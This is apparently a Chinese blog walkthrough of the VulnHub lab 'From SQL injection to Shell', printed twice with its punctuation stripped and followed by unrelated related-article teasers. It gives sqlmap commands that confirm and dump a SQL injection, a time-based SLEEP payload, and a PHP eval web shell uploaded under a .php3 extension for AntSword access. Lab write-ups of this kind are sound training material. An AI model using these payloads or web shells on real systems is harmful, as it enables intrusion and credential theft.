一、概括通过基础潘顿和推测网页存在sql注入漏洞验证存在漏洞利用sql注入获得数据库中敏感数据登录到网页管理员页面发现存在文件上传漏洞利用文件上传漏洞获取服务器的信息二、通关过程nmap获得靶机访问地址通过靶机的mac地址和探测结果得出靶机IP地址浏览器访问地址首页没有发现什么明显内容访问其它网页发现存在特殊参数id五i测存在sql漏洞这里还发现了登录页面sqlmap探测漏洞sqlmap-uhttp://192.168.8.155/cat.php?id1--batch验真是否存在id2AND(SELECT5851FROM(SELECT(SLEEP(5)))nqWc)页面存在明显的延迟那就是探测无误存在sql注入获取数据sqlmap -u http://192.168.8.155/cat.php?id1 -D photoblog -T users --dump获得用户名密码登录后台查看信息页面存在文件上传推测存在漏洞创建一个文件试试看写入?php eval($_POST[cmd]);?直接上传发现提示无法上传php文件那试试php3等文件后缀通过访问本页面的其它图片判断图片存放位置蚁剑连接测试连接成功访问其它文件即可
vulnhub靶场From SQL injection to Shell
一、概括通过基础潘顿和推测网页存在sql注入漏洞验证存在漏洞利用sql注入获得数据库中敏感数据登录到网页管理员页面发现存在文件上传漏洞利用文件上传漏洞获取服务器的信息二、通关过程nmap获得靶机访问地址通过靶机的mac地址和探测结果得出靶机IP地址浏览器访问地址首页没有发现什么明显内容访问其它网页发现存在特殊参数id五i测存在sql漏洞这里还发现了登录页面sqlmap探测漏洞sqlmap-uhttp://192.168.8.155/cat.php?id1--batch验真是否存在id2AND(SELECT5851FROM(SELECT(SLEEP(5)))nqWc)页面存在明显的延迟那就是探测无误存在sql注入获取数据sqlmap -u http://192.168.8.155/cat.php?id1 -D photoblog -T users --dump获得用户名密码登录后台查看信息页面存在文件上传推测存在漏洞创建一个文件试试看写入?php eval($_POST[cmd]);?直接上传发现提示无法上传php文件那试试php3等文件后缀通过访问本页面的其它图片判断图片存放位置蚁剑连接测试连接成功访问其它文件即可
相关文章
ScrapeGraphAI:用自然语言驱动的AI网页爬虫实战指南
1. 项目概述:这不是又一个“爬虫教程”,而是一次对AI驱动数据获取范式的重新校准ScrapeGraphAI Tutorial: Getting Started With AI Web Scraping——这个标题里藏着三个关键信号:ScrapeGraphAI是工具名,AI Web Scraping是技术本质…
三年陪护落幕,最舍不得我的是百岁奶奶
从业陪护近三年,我从未想过,一场无奈的告别,会让我收获最真挚的温情与牵挂。近日因家中需要照看小孙女,我万般不舍之下,还是决定辞去陪护工作,正式和相处三年的家属与老人们告别。三年朝夕相伴,…
免费一键去图片水印的app有哪些?2026年无广告手机工具与平台差异解析
免费一键去图片水印的app有哪些?2026年无广告手机工具与平台差异解析 在日常修图或整理素材时,图片水印常常影响画面干净度,而短视频链接里的水印同样会干扰二次创作。面对这些场景,很多人希望找到轻量、免费且真正能一键去除水印…
MDX 终极指南:从入门到精通,解锁内容开发的未来
摘要:在组件化开发大行其道的今天,Markdown 已经无法满足现代 Web 应用对富交互内容的需求。MDX 作为 Markdown 与 JSX 的完美结合体,正在成为技术文档、博客系统和设计系统的首选方案。本文将从零开始,由浅入深地讲解 MDX 的核心…
质量管理 -控制计划CP的五大要素
控制计划(Control Plan, CP)的核心要素控制计划是质量管理中用于确保产品/过程符合要求的结构化文档,其五大关键要素如下:1. 过程输入与输出输入:明确需控制的特性(如尺寸、材料性能)࿰…
STS-Bcut:基于必剪API的自动化语音转字幕技术实现与架构解析
STS-Bcut:基于必剪API的自动化语音转字幕技术实现与架构解析 【免费下载链接】STS-Bcut 使用必剪API,语音转字幕,支持输入声音文件,也支持输入视频文件自动提取音频。 项目地址: https://gitcode.com/gh_mirrors/st/STS-Bcut …
源头厂家直供:高精度墨盒灌装机,如何精准避坑选对?
打印耗材市场风云变幻,高精度墨盒灌装机作为生产线的核心设备,直接关系到产品的良品率与生产效率。面对“源头厂家直供”的众多选择,如何在保证精度的同时,避开技术陷阱与营销噱头,成为行业从业者必须掌握的硬核技能。…
一道字节面试智力题背后的工程师思维:100只老虎和1只羊的博弈论解析
一道字节面试智力题背后的工程师思维:100只老虎和1只羊的博弈论解析在技术面试中,有些题目看似与编码无关,却在考察你最核心的思维能力。本文通过一道经典的博弈论智力题,拆解逆向归纳、数学归纳法、纳什均衡等概念在工程实践中的…
SCTX2CS/SCDRX2ES 五功能遥控IC
一、概述 SCTX2CS/SCDRX2ES 是一对CMOS 集成芯片,专设计用于遥控车应用方面。SCTX2CS/SCDRX2ES 有5 个控制键用于控制遥控车的动作(如前进、后退、右转、左转和旋转功能)。 SCDRX2ES 专设计用于低电压工作环境,内置升压电路,通过简单外接电路,…
Qwen2.5-Turbo百万上下文实战指南:百炼平台长文本处理全解析
1. 项目概述:这不是一次普通模型更新,而是一次上下文能力的质变跃迁“Qwen2.5-Turbo上线阿里云百炼平台,模型上下文长度扩展至百万tokens”——这句话里藏着三个关键信号:Turbo不是简单提速,而是面向生产环境的工程化重…
Kotlin的@JvmStatic与@JvmField:与Java互操作的注解
Kotlin作为一门现代编程语言,与Java的互操作性一直是其核心优势之一。为了让Kotlin代码能够无缝对接Java,Kotlin提供了多种注解来优化互操作体验,其中JvmStatic和JvmField是两个关键注解。它们分别用于解决静态成员和字段在Java中的访问问题&…
AI 驱动下 GEO 与 SEO 融合实战指南
摘要:本文深入探讨了从传统SEO到生成式搜索(GEO)的范式转移,为技术内容创作者揭示了新搜索生态下的挑战与机遇。面对大模型直接生成答案的趋势,单纯的关键词排名已不足以保证流量。文章系统性地提出了三大核心策略&…
Google AI Studio 300美元额度的真相与实战指南
1. 这300美金不是“送钱”,而是Google埋下的第一道技术门槛 你看到标题里那个醒目的“$300美金”时,第一反应可能是:又一个免费额度?领完就完事?我亲手试过——这300美金根本不是红包,而是一张入场券&…
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程
PDF对比终极指南:用diff-pdf轻松识别文档差异的完整教程 【免费下载链接】diff-pdf A simple tool for visually comparing two PDF files 项目地址: https://gitcode.com/gh_mirrors/di/diff-pdf 还在为PDF文档的版本对比而烦恼吗?diff-pdf这款开…
嵌入式GUI控件实战:ROTARY、SCROLLBAR、SLIDER原理与应用
1. 嵌入式GUI控件:从原理到实战的深度解析在嵌入式系统开发中,图形用户界面(GUI)的设计与实现往往是项目从“能用”到“好用”的关键一跃。不同于资源充沛的PC或移动平台,嵌入式设备的GUI需要在有限的CPU性能、内存空间…
Zotero Duplicates Merger:5步彻底清理文献库重复条目
Zotero Duplicates Merger:5步彻底清理文献库重复条目 【免费下载链接】ZoteroDuplicatesMerger A zotero plugin to automatically merge duplicate items 项目地址: https://gitcode.com/gh_mirrors/zo/ZoteroDuplicatesMerger 还在为文献库中堆积如山的重…
利用随机有限集理论对蜂群的ILQR和MPC控制研究附Matlab代码
✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…